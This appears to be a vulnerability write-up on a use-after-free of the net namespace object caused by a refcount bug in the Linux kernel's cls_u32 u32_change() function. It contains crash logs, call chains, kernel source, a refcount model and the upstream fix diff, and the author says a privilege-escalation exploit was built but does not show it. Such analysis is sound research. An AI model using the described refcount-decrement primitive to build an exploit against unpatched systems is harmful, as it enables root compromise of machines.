-->

The Linux Kernel Network Scheduler Vulnerabilities and Exploits - Privilege Escalation

 


The u32 filter Overview

Where the module is:

net/sched/cls_u32.c

Ugly (or Universal) 32bit key Packet Classifier.

Linux TC (traffic control) Flow Control Introduction

Linux TC applies different throughput and delay limits to specific IP addresses.

Netlink and TC 

TC is implemented based on the Netlink protocol.


Default Qdisc

Multi-queue default Qdisc

A custom qdisc setup

One Example

Transmission quality control, transmission bandwidth and delay


TC can be driven from shell commands (the tc utility) or programmatically through Netlink.
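As a rough illustration of the Netlink route, the sketch below fills in the fixed part of an RTM_NEWTFILTER request for a "u32" classifier. The function name build_u32_filter_request and its parameters are made up for this example; a real request would also carry a TCA_OPTIONS attribute with the u32 selector and would be sent on a NETLINK_ROUTE socket.

```c
#include <stddef.h>
#include <string.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/rtnetlink.h>

/*
 * Hypothetical helper: write nlmsghdr + tcmsg + TCA_KIND("u32") into buf.
 * buf must be 4-byte aligned. Returns the message length, or 0 if buf is
 * too small. The u32 selector (TCA_OPTIONS) is deliberately left out.
 */
size_t build_u32_filter_request(void *buf, size_t buflen, int ifindex,
                                unsigned int parent, unsigned int info)
{
    static const char kind[] = "u32";
    size_t hdr_len = NLMSG_LENGTH(sizeof(struct tcmsg));
    size_t total = NLMSG_ALIGN(hdr_len) + RTA_SPACE(sizeof(kind));
    struct nlmsghdr *nlh = buf;
    struct tcmsg *tcm;
    struct rtattr *rta;

    if (buflen < total)
        return 0;
    memset(buf, 0, total);

    nlh->nlmsg_len = total;
    nlh->nlmsg_type = RTM_NEWTFILTER;
    nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL | NLM_F_ACK;

    tcm = NLMSG_DATA(nlh);
    tcm->tcm_family = AF_UNSPEC;
    tcm->tcm_ifindex = ifindex;   /* device the filter attaches to */
    tcm->tcm_parent = parent;     /* handle of the parent qdisc/class */
    tcm->tcm_info = info;         /* (priority << 16) | protocol */

    /* The classifier name travels as a TCA_KIND attribute. */
    rta = (struct rtattr *)((char *)buf + NLMSG_ALIGN(hdr_len));
    rta->rta_type = TCA_KIND;
    rta->rta_len = RTA_LENGTH(sizeof(kind));
    memcpy(RTA_DATA(rta), kind, sizeof(kind));

    return total;
}
```

A caller would pass the returned length to sendmsg() on a socket created with socket(AF_NETLINK, SOCK_RAW, NETLINK_ROUTE) and then read the acknowledgement.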

Vulnerability Mining

While preparing for the 2021 Tianfu Cup competition, I went through the crashes that syzkaller had previously produced locally and found a use-after-free (UAF) on an object that lives in a dedicated slab cache. This class of vulnerability had not been exploited before, but I decided to give it a try.


The vulnerability was analyzed by Liu Yong, who found that a UAF in a dedicated slab cache might still allow privilege escalation. The exploit was completed around October. Because other vulnerabilities were available for the competition, and because this one is stealthy, has a good privilege-escalation success rate, and provides both the information leak and the privilege escalation on its own, it was held in reserve. The KASAN report is as follows:
[  203.112091] ==================================================================
[  203.112113] BUG: KASAN: use-after-free in sock_prot_inuse_add+0x80/0x90
[  203.112121] Read of size 8 at addr ffff888106660188 by task poc/6597

[  203.112134] CPU: 0 PID: 6597 Comm: poc Tainted: G                 ---------r-  - 4.18.0+ #32
[  203.112138] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/22/2020
[  203.112140] Call Trace:
[  203.112148]  dump_stack+0xa4/0xea
[  203.112164]  print_address_description.constprop.5+0x1e/0x230
[  203.112197]  __kasan_report.cold.7+0x37/0x82
[  203.112210]  kasan_report+0x3b/0x50
[  203.112217]  sock_prot_inuse_add+0x80/0x90
[  203.112224]  netlink_release+0x97f/0x1190
[  203.112257]  __sock_release+0xd3/0x2b0
[  203.112262]  sock_close+0x1e/0x30
[  203.112267]  __fput+0x2d4/0x840
[  203.112275]  task_work_run+0x16e/0x1d0
[  203.112284]  exit_to_usermode_loop+0x207/0x230
[  203.112290]  do_syscall_64+0x3f5/0x470
[  203.112302]  entry_SYSCALL_64_after_hwframe+0x65/0xca
[  203.112308] RIP: 0033:0x7fee34abd1a8
[  203.112315] Code: 07 02 00 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 f3 0f 1e fa 48 8d 05 b5 44 2d 00 8b 00 85 c0 75 17 b8 03 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 40 c3 0f 1f 80 00 00 00 00 53 89 fb 48 83 ec
[  203.112318] RSP: 002b:00007ffdb62366c8 EFLAGS: 00000246 ORIG_RAX: 0000000000000003
[  203.112323] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 00007fee34abd1a8
[  203.112327] RDX: 0000000000000000 RSI: 00000000200001c0 RDI: 0000000000000004
[  203.112330] RBP: 00007ffdb62366e0 R08: 00007ffdb62366e0 R09: 00007ffdb62366e0
[  203.112333] R10: 00007ffdb62366e0 R11: 0000000000000246 R12: 0000000000400f50
[  203.112337] R13: 00007ffdb6236820 R14: 0000000000000000 R15: 0000000000000000

[  203.112345] Allocated by task 6247:
[  203.112353]  kasan_save_stack+0x1d/0x80
[  203.112359]  __kasan_kmalloc.constprop.10+0xc1/0xd0
[  203.112367]  slab_post_alloc_hook+0x43/0x280
[  203.112377]  kmem_cache_alloc+0x131/0x280
[  203.112386]  copy_net_ns+0xec/0x330
[  203.112395]  create_new_namespaces+0x583/0x9a0
[  203.112404]  unshare_nsproxy_namespaces+0xcb/0x200
[  203.112414]  ksys_unshare+0x468/0x8d0
[  203.112423]  __x64_sys_unshare+0x36/0x50
[  203.112432]  do_syscall_64+0xe4/0x470
[  203.112443]  entry_SYSCALL_64_after_hwframe+0x65/0xca

[  203.112453] Freed by task 59:
[  203.112487]  kasan_save_stack+0x1d/0x80
[  203.112510]  kasan_set_track+0x20/0x30
[  203.112535]  kasan_set_free_info+0x1f/0x30
[  203.112557]  __kasan_slab_free+0x108/0x150
[  203.112578]  kmem_cache_free+0x83/0x430
[  203.112593]  net_drop_ns+0x7d/0x90
[  203.112604]  cleanup_net+0x6ee/0x960
[  203.112619]  process_one_work+0x742/0x1030
[  203.112632]  worker_thread+0x95/0xce0
[  203.112643]  kthread+0x32c/0x3f0
[  203.112654]  ret_from_fork+0x35/0x40

[  203.112686] The buggy address belongs to the object at ffff888106660000
                which belongs to the cache net_namespace of size 8000
[  203.112698] The buggy address is located 392 bytes inside of
                8000-byte region [ffff888106660000, ffff888106661f40)
[  203.112704] The buggy address belongs to the page:
[  203.112739] page:ffffea0004199800 refcount:1 mapcount:0 mapping:00000000306a7880 index:0xffff888106664080 head:ffffea0004199800 order:3 compound_mapcount:0 compound_pincount:0
[  203.112752] flags: 0x17ffffc0008100(slab|head)
[  203.112774] raw: 0017ffffc0008100 dead000000000100 dead000000000200 ffff88810b6ff600
[  203.112792] raw: ffff888106664080 0000000080030002 00000001ffffffff ffff888101f819c1
[  203.112798] page dumped because: kasan: bad access detected
[  203.112803] pages's memcg:ffff888101f819c1

[  203.112814] Memory state around the buggy address:
[  203.112831]  ffff888106660080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  203.112857]  ffff888106660100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  203.112868] >ffff888106660180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  203.112873]                       ^
[  203.112884]  ffff888106660200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  203.112894]  ffff888106660280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[  203.112900] =================================================================
However, on April 12, 2022, syzbot hit a similar issue, reported as a WARNING, and the community fixed it shortly afterwards. In the end, the exploit was used in a domestic security competition.


Vulnerability Principle

Original PoC

The PoC generated automatically by syzkaller triggers the vulnerability reliably.

Allocation

unshare
|-> __x64_sys_unshare
 |-> ksys_unshare
  |-> unshare_nsproxy_namespaces
   |-> copy_net_ns
    |-> kmem_cache_alloc
Free
exit_process
 |-> ret_from_fork
  |-> kthread
   |-> worker_thread
    |-> process_one_work
     |-> cleanup_net
      |-> net_drop_ns
       |-> kmem_cache_free
Use after free
close
 |-> exit_to_usermode_loop
  |-> task_work_run
   |-> __fput
    |-> sock_close
     |-> __sock_release
      |-> netlink_release
       |-> sock_prot_inuse_add
Source code that allocates the net
net/core/net_namespace.c
struct net *copy_net_ns(unsigned long flags,
                        struct user_namespace *user_ns, struct net *old_net)
{
        struct ucounts *ucounts;
        struct net *net;
        int rv;

        if (!(flags & CLONE_NEWNET))
                return get_net(old_net);

        ucounts = inc_net_namespaces(user_ns);
        if (!ucounts)
                return ERR_PTR(-ENOSPC);

        net = net_alloc();    /* <--- */
        if (!net) {
                rv = -ENOMEM;
                goto dec_ucounts;
        }
        refcount_set(&net->passive, 1);
        net->ucounts = ucounts;
        get_user_ns(user_ns);
....
        return net;
}

static struct net *net_alloc(void)
{
        struct net *net = NULL;
        struct net_generic *ng;

        ng = net_alloc_generic();
        if (!ng)
                goto out;

        net = kmem_cache_zalloc(net_cachep, GFP_KERNEL);    /* <--- */
        if (!net)
                goto out_free;

....
}
$ sudo cat /sys/kernel/slab/net_namespace/object_size 
4928
$ sudo cat /sys/kernel/slab/net_namespace/order 
3
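The two sysfs values above bound how many net objects share one slab, which matters later for the heap layout. The helper below is a minimal sketch of that arithmetic; objs_per_slab is a name chosen for this example, and the result is only an upper-bound estimate because SLUB may pad each object beyond object_size (the authoritative figure is /sys/kernel/slab/net_namespace/objs_per_slab).

```c
#include <stddef.h>

/*
 * Estimate how many objects of slab_obj_size bytes fit into one slab of
 * 2^order pages. Per-object padding and metadata are ignored, so the real
 * count can be lower than this estimate.
 */
size_t objs_per_slab(unsigned int order, size_t page_size, size_t slab_obj_size)
{
    if (slab_obj_size == 0)
        return 0;
    return (page_size << order) / slab_obj_size;
}
```

With order 3, 4096-byte pages and the 4928-byte object size shown above, this gives 6 objects per 32768-byte slab; with the 8000-byte size from the KASAN report it gives 4.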
Release function
void net_drop_ns(void *p)
{
        struct net *net = (struct net *)p;

        if (net)
                net_free(net);
}
The structure affected by the UAF (from here on, net_namespace objects are referred to as the net structure)
struct net {
        /* First cache line can be often dirtied.
         * Do not place here read-mostly fields.
         */
        refcount_t              passive;        /* To decide when the network
                                                 * namespace should be freed.
                                                 */
        spinlock_t              rules_mod_lock;

        unsigned int            dev_unreg_count;

        unsigned int            dev_base_seq;   /* protected by rtnl_mutex */
        int                     ifindex;

        spinlock_t              nsid_lock;
        atomic_t                fnhe_genid;

        struct list_head        list;           /* list of network namespaces */
        struct list_head        exit_list;      /* To linked to call pernet exit
                                                 * methods on dead net (
                                                 * pernet_ops_rwsem read locked),
                                                 * or to unregister pernet ops
                                                 * (pernet_ops_rwsem write locked).
                                                 */
        struct llist_node       cleanup_list;   /* namespaces on death row */

#ifdef CONFIG_KEYS
        struct key_tag          *key_domain;    /* Key domain of operation tag */
#endif
        struct user_namespace   *user_ns;       /* Owning user namespace */
        struct ucounts          *ucounts;
        struct idr              netns_ids;

        struct ns_common        ns;    /* <--- used for the arbitrary address read */

        struct list_head        dev_base_head;
        struct proc_dir_entry   *proc_net;
        struct proc_dir_entry   *proc_net_stat;

#ifdef CONFIG_SYSCTL
        struct ctl_table_set    sysctls;
#endif

        struct sock             *rtnl;                  /* rtnetlink socket */
        struct sock             *genl_sock;

        struct uevent_sock      *uevent_sock;           /* uevent socket */

        struct hlist_head       *dev_name_head;
        struct hlist_head       *dev_index_head;
        struct raw_notifier_head        netdev_chain;

        /* Note that @hash_mix can be read millions times per second,
         * it is critical that it is on a read_mostly cache line.
         */
        u32                     hash_mix;

        struct net_device       *loopback_dev;          /* The loopback */

        /* core fib_rules */
        struct list_head        rules_ops;

        struct netns_core       core;
        struct netns_mib        mib;
        struct netns_packet     packet;
        struct netns_unix       unx;
        struct netns_nexthop    nexthop;
        struct netns_ipv4       ipv4;
#if IS_ENABLED(CONFIG_IPV6)
        struct netns_ipv6       ipv6;
#endif
#if IS_ENABLED(CONFIG_IEEE802154_6LOWPAN)
        struct netns_ieee802154_lowpan  ieee802154_lowpan;
#endif
#if defined(CONFIG_IP_SCTP) || defined(CONFIG_IP_SCTP_MODULE)
        struct netns_sctp       sctp;
#endif
#ifdef CONFIG_NETFILTER
        struct netns_nf         nf;
#if defined(CONFIG_NF_CONNTRACK) || defined(CONFIG_NF_CONNTRACK_MODULE)
        struct netns_ct         ct;
#endif
#if defined(CONFIG_NF_TABLES) || defined(CONFIG_NF_TABLES_MODULE)
        struct netns_nftables   nft;
#endif
#endif
#ifdef CONFIG_WEXT_CORE
        struct sk_buff_head     wext_nlevents;
#endif
        struct net_generic __rcu        *gen;

        /* Used to store attached BPF programs */
        struct netns_bpf        bpf;

        /* Note : following structs are cache line aligned */
#ifdef CONFIG_XFRM
        struct netns_xfrm       xfrm;
#endif

        u64                     net_cookie; /* written once */

#if IS_ENABLED(CONFIG_IP_VS)
        struct netns_ipvs       *ipvs;
#endif
#if IS_ENABLED(CONFIG_MPLS)
        struct netns_mpls       mpls;
#endif
#if IS_ENABLED(CONFIG_CAN)
        struct netns_can        can;
#endif
#ifdef CONFIG_XDP_SOCKETS
        struct netns_xdp        xdp;
#endif
#if IS_ENABLED(CONFIG_MCTP)
        struct netns_mctp       mctp;
#endif
#if IS_ENABLED(CONFIG_CRYPTO_USER)
        struct sock             *crypto_nlsk;
#endif
        struct sock             *diag_nlsk;
#if IS_ENABLED(CONFIG_SMC)
        struct netns_smc        smc;
#endif
} __randomize_layout;

PoC Rewriting

Further analysis showed the root cause: the u32_change function incorrectly drops a reference on the net, a logic bug that leads to the UAF. With that understood, the PoC's trigger path was simplified.
u32_change()
 |--> u32_destroy_key()
  |--> tcf_exts_put_net()
   |--> put_net()
This also yields a logic primitive: each trigger decrements the reference count of the net by 1.
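The imbalance can be modelled in a few lines of userspace C. Everything below is a stand-in written for illustration (the model_* names are not kernel symbols): initialisation only stores the net pointer, a reference is supposed to be taken by a separate get call, and the error path calls put without that get ever having run.

```c
#include <stdbool.h>

/* Userspace stand-ins; these are not the kernel definitions. */
struct model_net  { int refs; bool freed; };
struct model_exts { struct model_net *net; };

/* Like tcf_exts_init(): remember the net but take NO reference. */
void model_exts_init(struct model_exts *e, struct model_net *net)
{
    e->net = net;
}

/* Like tcf_exts_get_net(): the only place a reference is taken. */
void model_exts_get_net(struct model_exts *e)
{
    e->net->refs++;
}

/* Like tcf_exts_put_net(): drop one reference, free at zero. */
void model_exts_put_net(struct model_exts *e)
{
    if (--e->net->refs == 0)
        e->net->freed = true;
}

/* Model of the buggy error path: a put with no matching get. */
void model_u32_change_error_path(struct model_net *net)
{
    struct model_exts exts;

    model_exts_init(&exts, net);
    model_exts_put_net(&exts);   /* unbalanced: steals someone else's reference */
}
```

Starting from a net with two legitimate references, two passes through the error path mark it freed even though both legitimate holders still point at it.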


The optimized trigger produces the following kernel log:
[  253.623920] ------------[ cut here ]------------
[  253.623929] refcount_t: underflow; use-after-free.
[  253.623984] WARNING: CPU: 0 PID: 4009 at lib/refcount.c:28 refcount_warn_saturate+0x10c/0x1f0
[  253.624026] Modules linked in: act_police cls_u32 ip6_gre gre ip6_tunnel tunnel6 uas usb_storage binfmt_misc snd_seq_dummy snd_hrtimer vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vsock snd_ens1371 snd_ac97_codec gameport ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_msr intel_rapl_common nls_iso8859_1 snd_seq crct10dif_pclmul ghash_clmulni_intel sch_fq_codel aesni_intel snd_seq_device crypto_simd snd_timer cryptd snd vmw_balloon joydev rapl input_leds soundcore vmw_vmci serio_raw vmwgfx ttm drm_kms_helper mac_hid cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt ipmi_devintf ipmi_msghandler msr parport_pc ppdev lp drm parport ip_tables x_tables autofs4 hid_generic crc32_pclmul psmouse usbhid ahci mptspi hid libahci mptscsih e1000 mptbase scsi_transport_spi i2c_piix4 pata_acpi floppy
[  253.624306] CPU: 0 PID: 4009 Comm: apparmor_parser Tainted: G    B             5.15.30+ #2
[  253.624330] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/22/2020
[  253.624338] RIP: 0010:refcount_warn_saturate+0x10c/0x1f0
[  253.624351] Code: 1d 6d 3a 1d 03 31 ff 89 de e8 90 f1 18 ff 84 db 75 a0 e8 47 f6 18 ff 48 c7 c7 e0 f0 65 85 c6 05 4d 3a 1d 03 01 e8 f2 76 57 01 <0f> 0b eb 84 e8 2b f6 18 ff 0f b6 1d 36 3a 1d 03 31 ff 89 de e8 5b
[  253.624361] RSP: 0000:ffff888137fafc90 EFLAGS: 00010282
[  253.624369] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[  253.624376] RDX: ffff88810caf0000 RSI: 0000000000000100 RDI: ffffed1026ff5f84
[  253.624383] RBP: ffff888137fafca0 R08: 0000000000000100 R09: ffff8881e183098b
[  253.624390] R10: 0000000000000000 R11: 0000000000000001 R12: ffff888120ec008c
[  253.624397] R13: ffff888105f42000 R14: ffff888120ec0000 R15: ffff888120ec008c
[  253.624404] FS:  00007fc64fc8d740(0000) GS:ffff8881e1800000(0000) knlGS:0000000000000000
[  253.624414] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  253.624421] CR2: 000055893f3fadf9 CR3: 0000000135002001 CR4: 00000000003706f0
[  253.624445] Call Trace:
[  253.624451]  <TASK>
[  253.624458]  __sk_destruct+0x693/0x790
[  253.624478]  sk_destruct+0xd3/0x100
[  253.624494]  __sk_free+0xfe/0x400
[  253.624509]  sk_free+0x88/0xc0
[  253.624524]  deferred_put_nlk_sk+0x170/0x320
[  253.624544]  rcu_core+0x51a/0x1250
[  253.624607]  rcu_core_si+0xe/0x10
[  253.624618]  __do_softirq+0x189/0x536
[  253.624631]  irq_exit_rcu+0xec/0x130
[  253.624641]  sysvec_apic_timer_interrupt+0x40/0x90
[  253.624664]  asm_sysvec_apic_timer_interrupt+0x12/0x20
[  253.624675] RIP: 0033:0x55893f2e92d2
[  253.624685] Code: c3 0f 1f 80 00 00 00 00 48 39 cb 74 3b 48 8b 7d 10 49 89 d8 4c 89 ee 48 8b 07 48 89 54 24 68 44 89 f2 48 89 4c 24 60 4c 89 e1 <48> 8b 40 38 48 83 c4 28 5b 5d 41 5c 41 5d 41 5e 41 5f ff e0 66 2e
[  253.624694] RSP: 002b:00007ffc26b6c960 EFLAGS: 00000202
[  253.624703] RAX: 000055893f3ec3a0 RBX: 0000558940c048d0 RCX: 000055893f3eb588
[  253.624710] RDX: 0000000000000006 RSI: 0000000000000000 RDI: 000055893f3eb510
[  253.624717] RBP: 000055893f3eb528 R08: 0000558940c048d0 R09: 000055893f3eb4a0
[  253.624723] R10: 0000558940e14270 R11: 00007fc64fea9ce0 R12: 000055893f3eb588
[  253.624730] R13: 0000000000000000 R14: 0000000000000006 R15: 000055893f3a48e8
[  253.624740]  </TASK>
[  253.624743] ---[ end trace ddbeecae4d8b2b8c ]---
[  253.626421] ------------[ cut here ]------------
[  253.626431] refcount_t: saturated; leaking memory.
[  253.626489] WARNING: CPU: 3 PID: 309 at lib/refcount.c:19 refcount_warn_saturate+0x1bd/0x1f0
[  253.626513] Modules linked in: act_police cls_u32 ip6_gre gre ip6_tunnel tunnel6 uas usb_storage binfmt_misc snd_seq_dummy snd_hrtimer vsock_loopback vmw_vsock_virtio_transport_common vmw_vsock_vmci_transport vsock snd_ens1371 snd_ac97_codec gameport ac97_bus snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_msr intel_rapl_common nls_iso8859_1 snd_seq crct10dif_pclmul ghash_clmulni_intel sch_fq_codel aesni_intel snd_seq_device crypto_simd snd_timer cryptd snd vmw_balloon joydev rapl input_leds soundcore vmw_vmci serio_raw vmwgfx ttm drm_kms_helper mac_hid cec rc_core fb_sys_fops syscopyarea sysfillrect sysimgblt ipmi_devintf ipmi_msghandler msr parport_pc ppdev lp drm parport ip_tables x_tables autofs4 hid_generic crc32_pclmul psmouse usbhid ahci mptspi hid libahci mptscsih e1000 mptbase scsi_transport_spi i2c_piix4 pata_acpi floppy
[  253.626837] CPU: 3 PID: 309 Comm: kworker/u256:28 Tainted: G    B   W         5.15.30+ #2
[  253.626851] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 07/22/2020
[  253.626859] Workqueue: netns cleanup_net
[  253.626874] RIP: 0010:refcount_warn_saturate+0x1bd/0x1f0
[  253.626888] Code: 03 31 ff 89 de e8 e3 f0 18 ff 84 db 0f 85 ef fe ff ff e8 96 f5 18 ff 48 c7 c7 e0 ef 65 85 c6 05 9f 39 1d 03 01 e8 41 76 57 01 <0f> 0b e9 d0 fe ff ff e8 77 f5 18 ff 48 c7 c7 40 f1 65 85 c6 05 7c
[  253.626899] RSP: 0000:ffff8881032ff688 EFLAGS: 00010282
[  253.626908] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
[  253.626915] RDX: ffff888103093380 RSI: 0000000000000000 RDI: ffffed102065fec3
[  253.626922] RBP: ffff8881032ff698 R08: 0000000000000000 R09: ffff8881e19b098b
[  253.626930] R10: 0000000000000000 R11: 0000000000000001 R12: ffff888120ec008c
[  253.626936] R13: ffff88812dc76500 R14: dffffc0000000000 R15: 00000000c0000000
[  253.626944] FS:  0000000000000000(0000) GS:ffff8881e1980000(0000) knlGS:0000000000000000
[  253.626954] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  253.626961] CR2: 00007f2ede8e1024 CR3: 00000001736a6006 CR4: 00000000003706e0
[  253.626993] Call Trace:
[  253.626997]  <TASK>
[  253.627006]  u32_clear_hnode+0x4c7/0x680 [cls_u32]
[  253.627058]  u32_destroy_hnode.isra.0+0xa4/0x240 [cls_u32]
[  253.627069]  u32_destroy+0x2da/0x390 [cls_u32]
[  253.627080]  tcf_proto_destroy+0x85/0x300
[  253.627091]  tcf_proto_put+0x9c/0xd0
[  253.627101]  tcf_chain_flush+0x1c0/0x310
[  253.627112]  __tcf_block_put+0x158/0x2e0
[  253.627123]  tcf_block_put+0xe3/0x130
[  253.627178]  fq_codel_destroy+0x3c/0xb0 [sch_fq_codel]
[  253.627189]  qdisc_destroy+0xb1/0x2a0
[  253.627200]  qdisc_put+0xe0/0x100
[  253.627211]  dev_shutdown+0x253/0x390
[  253.627224]  unregister_netdevice_many+0x7e0/0x1720
[  253.627282]  ip6gre_exit_batch_net+0x36b/0x450 [ip6_gre]
[  253.627367]  ops_exit_list+0x115/0x160
[  253.627378]  cleanup_net+0x475/0xb40
[  253.627403]  process_one_work+0x8bf/0x11d0
[  253.627416]  worker_thread+0x60b/0x1340
[  253.627441]  kthread+0x388/0x470
[  253.627461]  ret_from_fork+0x22/0x30
[  253.627476]  </TASK>
[  253.627480] ---[ end trace ddbeecae4d8b2b8d ]---

Vulnerability Patch

In the error paths of the u32_change function, tcf_exts_put_net(), which decrements the reference count of the net by 1, must not be called.
author Eric Dumazet <edumazet@google.com> 2022-04-13 10:35:41 -0700
committer Jakub Kicinski <kuba@kernel.org> 2022-04-15 14:26:11 -0700
commit 3db09e762dc79584a69c10d74a6b98f89a9979f8
tree 1a269d290124f61d42c2cb059de92a0661f818a5
parent f3226eed54318e7bdc186f8f7ed27bcd3cb8b681

net/sched: cls_u32: fix netns refcount changes in u32_change()

We are now able to detect extra put_net() at the moment
they happen, instead of much later in correct code paths.

u32_init_knode() / tcf_exts_init() populates the ->exts.net
pointer, but as mentioned in tcf_exts_init(),
the refcount on netns has not been elevated yet.

The refcount is taken only once tcf_exts_get_net()
is called.

So the two u32_destroy_key() calls from u32_change()
are attempting to release an invalid reference on the netns.

syzbot report:

refcount_t: decrement hit 0; leaking memory.
WARNING: CPU: 0 PID: 21708 at lib/refcount.c:31 refcount_warn_saturate+0xbf/0x1e0 lib/refcount.c:31
Modules linked in:
CPU: 0 PID: 21708 Comm: syz-executor.5 Not tainted 5.18.0-rc2-next-20220412-syzkaller #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 01/01/2011
RIP: 0010:refcount_warn_saturate+0xbf/0x1e0 lib/refcount.c:31
Code: 1d 14 b6 b2 09 31 ff 89 de e8 6d e9 89 fd 84 db 75 e0 e8 84 e5 89 fd 48 c7 c7 40 aa 26 8a c6 05 f4 b5 b2 09 01 e8 e5 81 2e 05 <0f> 0b eb c4 e8 68 e5 89 fd 0f b6 1d e3 b5 b2 09 31 ff 89 de e8 38
RSP: 0018:ffffc900051af1b0 EFLAGS: 00010286
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
RDX: 0000000000040000 RSI: ffffffff8160a0c8 RDI: fffff52000a35e28
RBP: 0000000000000004 R08: 0000000000000000 R09: 0000000000000000
R10: ffffffff81604a9e R11: 0000000000000000 R12: 1ffff92000a35e3b
R13: 00000000ffffffef R14: ffff8880211a0194 R15: ffff8880577d0a00
FS:  00007f25d183e700(0000) GS:ffff8880b9c00000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00007f19c859c028 CR3: 0000000051009000 CR4: 00000000003506f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
 <TASK>
 __refcount_dec include/linux/refcount.h:344 [inline]
 refcount_dec include/linux/refcount.h:359 [inline]
 ref_tracker_free+0x535/0x6b0 lib/ref_tracker.c:118
 netns_tracker_free include/net/net_namespace.h:327 [inline]
 put_net_track include/net/net_namespace.h:341 [inline]
 tcf_exts_put_net include/net/pkt_cls.h:255 [inline]
 u32_destroy_key.isra.0+0xa7/0x2b0 net/sched/cls_u32.c:394
 u32_change+0xe01/0x3140 net/sched/cls_u32.c:909
 tc_new_tfilter+0x98d/0x2200 net/sched/cls_api.c:2148
 rtnetlink_rcv_msg+0x80d/0xb80 net/core/rtnetlink.c:6016
 netlink_rcv_skb+0x153/0x420 net/netlink/af_netlink.c:2495
 netlink_unicast_kernel net/netlink/af_netlink.c:1319 [inline]
 netlink_unicast+0x543/0x7f0 net/netlink/af_netlink.c:1345
 netlink_sendmsg+0x904/0xe00 net/netlink/af_netlink.c:1921
 sock_sendmsg_nosec net/socket.c:705 [inline]
 sock_sendmsg+0xcf/0x120 net/socket.c:725
 ____sys_sendmsg+0x6e2/0x800 net/socket.c:2413
 ___sys_sendmsg+0xf3/0x170 net/socket.c:2467
 __sys_sendmsg+0xe5/0x1b0 net/socket.c:2496
 do_syscall_x64 arch/x86/entry/common.c:50 [inline]
 do_syscall_64+0x35/0xb0 arch/x86/entry/common.c:80
 entry_SYSCALL_64_after_hwframe+0x44/0xae
RIP: 0033:0x7f25d0689049
Code: ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 40 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 c7 c1 b8 ff ff ff f7 d8 64 89 01 48
RSP: 002b:00007f25d183e168 EFLAGS: 00000246 ORIG_RAX: 000000000000002e
RAX: ffffffffffffffda RBX: 00007f25d079c030 RCX: 00007f25d0689049
RDX: 0000000000000000 RSI: 0000000020000340 RDI: 0000000000000005
RBP: 00007f25d06e308d R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000
R13: 00007ffd0b752e3f R14: 00007f25d183e300 R15: 0000000000022000
 </TASK>

Fixes: 35c55fc156d8 ("cls_u32: use tcf_exts_get_net() before call_rcu()")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: syzbot <syzkaller@googlegroups.com>
Cc: Cong Wang <xiyou.wangcong@gmail.com>
Cc: Jiri Pirko <jiri@resnulli.us>
Acked-by: Jamal Hadi Salim <jhs@mojatatu.com>
Signed-off-by: Jakub Kicinski <kuba@kernel.org>
Diffstat
-rw-r--r-- net/sched/cls_u32.c 16 
1 files changed, 10 insertions, 6 deletions
diff --git a/net/sched/cls_u32.c b/net/sched/cls_u32.c
index cf5649292ee00..fcba6c43ba509 100644
--- a/net/sched/cls_u32.c
+++ b/net/sched/cls_u32.c
@@ -386,14 +386,19 @@ static int u32_init(struct tcf_proto *tp)
  return 0;
 }

-static int u32_destroy_key(struct tc_u_knode *n, bool free_pf)
+static void __u32_destroy_key(struct tc_u_knode *n)
 {
  struct tc_u_hnode *ht = rtnl_dereference(n->ht_down);

  tcf_exts_destroy(&n->exts);
- tcf_exts_put_net(&n->exts);
  if (ht && --ht->refcnt == 0)
   kfree(ht);
+ kfree(n);
+}
+
+static void u32_destroy_key(struct tc_u_knode *n, bool free_pf)
+{
+ tcf_exts_put_net(&n->exts);
 #ifdef CONFIG_CLS_U32_PERF
  if (free_pf)
   free_percpu(n->pf);
@@ -402,8 +407,7 @@ static int u32_destroy_key(struct tc_u_knode *n, bool free_pf)
  if (free_pf)
   free_percpu(n->pcpu_success);
 #endif
- kfree(n);
- return 0;
+ __u32_destroy_key(n);
 }

 /* u32_delete_key_rcu should be called when free'ing a copied
@@ -900,13 +904,13 @@ static int u32_change(struct net *net, struct sk_buff *in_skb,
         extack);

   if (err) {
-   u32_destroy_key(new, false);
+   __u32_destroy_key(new);
    return err;
   }

   err = u32_replace_hw_knode(tp, new, flags, extack);
   if (err) {
-   u32_destroy_key(new, false);
+   __u32_destroy_key(new);
    return err;
   }

How the Bug Was Introduced

commit 35c55fc156d85a396a975fc17636f560fc02fd65
Author: Cong Wang <xiyou.wangcong@gmail.com>
Date:   Mon Nov 6 13:47:30 2017 -0800

